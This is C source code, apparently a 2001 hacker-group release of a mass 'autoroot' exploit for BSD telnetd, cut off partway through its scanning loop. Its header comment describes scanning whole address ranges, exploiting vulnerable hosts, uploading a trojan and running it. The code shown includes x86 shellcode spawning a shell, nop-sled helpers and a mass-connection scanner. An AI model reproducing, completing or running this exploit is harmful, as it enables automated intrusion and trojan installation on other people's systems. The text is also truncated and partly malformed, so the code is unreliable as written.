/* x86/bsd telnetd remote autoroot exploit (mass enbabled) * * The-WCH CONFIDENTIAL - SOURCE MATERIALS * * This is the manually published source code of The-WCH. * * The contents of these coded instructions, statements and computer * programs may not be disclosed to third parties, copied or duplicated in * any form, in whole or in part, without the prior written permission of * The-WCH. * * (C) COPYRIGHT The-WCH Security, 2001 * All Rights Reserved * ***************************************************************************** * * Based on the *bsd telnetd remote root by TESO * tested against: BSDI BSD/OS 4.1 * NetBSD 1.5 * FreeBSD 3.1 * FreeBSD 4.0-REL * FreeBSD 4.2-REL * FreeBSD 4.3-BETA * FreeBSD 4.3-STABLE * FreeBSD 4.3-RELEASE * * Name : bsdautoroot.c * Affected : bsd * Description : Mass bsd telnetd auto rooter * Type : Remote * Author : Goni * * Thanks TESO for a wonderfull exploit. btw, sorry for rupping off some * lines from it, but you know...It was something that *has* to be done. * * This is the first release from The World Classic Hackers. Still a beta, but * code for the members works more fine. This might not work for ./h4xa0r * (hehh kiddies) but some of you might be able to fix it, say ... * * char *blah[]={"#include <blah.h>","blah .. blah"}; * f=fopen("foo.c","w"); * if (f != NULL) { * while(blah[i] != (char*)0) { * fputs(blah[i],f); * fputs("\n",f); * i++; * } * fclose(f); * } * * Remember, the file trojan.c *must* be in the directory the program is * initiated from. Other wise it will fail to work properly. * * Ok..in the end, this exploit is given two arguments, the Class to scan and * the log file. It will fork in the background and exploit the host vulnerable, * put the trojan on the remote host and execute it. Simple...is'nt it :) * * btw, I don't use comments in the public releases. :) * * Many thanks to Innocent Buoy (innocentbuoy@hotmail.com) Founder, The-WCH * for pointing me out at many occations. * * Greets to macwiz, He's a real cute boy :P...I LOVE YOU DUDE.......PPPPP * * Next -> Exploit -> linux telnetd remote root * * Goni of The-WCH * thewch@hotmail.com * */ #include <sys/wait.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <arpa/telnet.h> #include <netdb.h> #include <errno.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <time.h> int mode=16, num=245, bs=1; int num34=244, pop34=71833, bs34=0, walk; int xp_check(int fd); void xp_pop(int fd); void xp_setenv(int fd, unsigned char *var, unsigned char *val); void xp(int fd); int shell(int socket); unsigned long int random_get(unsigned long int low, unsigned long int high); int badstr(unsigned char *code, int code_len, unsigned char *bad, int bad_len); unsigned long int x86_nop_rwreg(); unsigned long int x86_nop_xfer(char *xferstr); unsigned int x86_nop(unsigned char *dest, unsigned int dest_len, unsigned char *bad, int bad_len); #define BSET(dest, len, val, bw) { dest &= ~(((unsigned char) ~0) >> bw); dest |= val << (8 - bw - len); bw += len; } unsigned char *shellcode = "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"; #define MAX_SOCKETS 100 #define TIMEOUT 20 #define S_NONE 0 #define S_CONNECTING 1 #define S_CHECK 2 struct conn_t { int s,flags,pid; char status; time_t a; struct sockaddr_in addr; } connlist[MAX_SOCKETS]; void check_sockets(); void check(int i); int talk(int sd, char *pkt, int pktl, char opc); int make_keypkt(char *pktbuf, char opc); void print_ver(char *host,int vul, char *buf); void handle_alarm(int signum); char *filename; int main(int argc, char *argv[]) { int cip=1, bb=0, dd=0, i, qa=0; if (argc < 3) { printf("Usage: %s <Class> <Log>\n", argv[0]); printf("Class : Class to scan, i-e 192 will scan whole 192.*\n"); printf("Log : log file to use IPs.log\n") return -1; } if (fork()) return -1; filename=argv[2]; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } while(1) { for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if (bb == 255) { FILE *f=fopen(filename,"a"); if (f != NULL) { fprintf(f,"%d.%d.0.0 - %d.%d.255.255\n",atoi(argv[1]),dd,atoi(argv[1]),dd); fclose(f); } if (dd == 255) { int k, ns=0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) exit(0); break; } else { cip = 0; bb = 0; dd++; } } else { cip = 0; bb++; } } if (connlist[i].status == S_CHECK) { if (waitpid(connlist[i].pid,NULL,WNOHANG) > 0) { connlist[i].status = S_NONE; kill(connlist[i].pid,9); } } if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING)) { close(connlist[i].s); connlist[i].status = S_NONE; } if (connlist[i].status == S_CONNECTING) { if (connect(connlist[i].s, (struct socka